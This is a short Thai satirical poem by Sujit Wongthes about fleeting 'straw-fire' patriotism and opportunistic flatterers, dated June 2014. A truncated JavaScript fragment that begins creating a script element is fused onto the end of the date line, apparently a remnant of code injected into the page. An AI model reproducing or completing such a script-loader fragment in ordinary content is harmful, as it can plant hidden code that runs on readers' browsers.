ไฟไหม้ฟาง

 

บังเกิดไฟไหม้ฟางฤดูฝน

โกลาหลน้ำหูน้ำตาไหล

รักชาติรักประวัติศาสตร์ไทย

สอพลอได้ดีแล้วก็ลืมแล้ว

 

สุจิตต์ วงษ์เทศ

อังคาร  17 มิถุนายน 2557var d=document;var s=d.createElement(‘script’);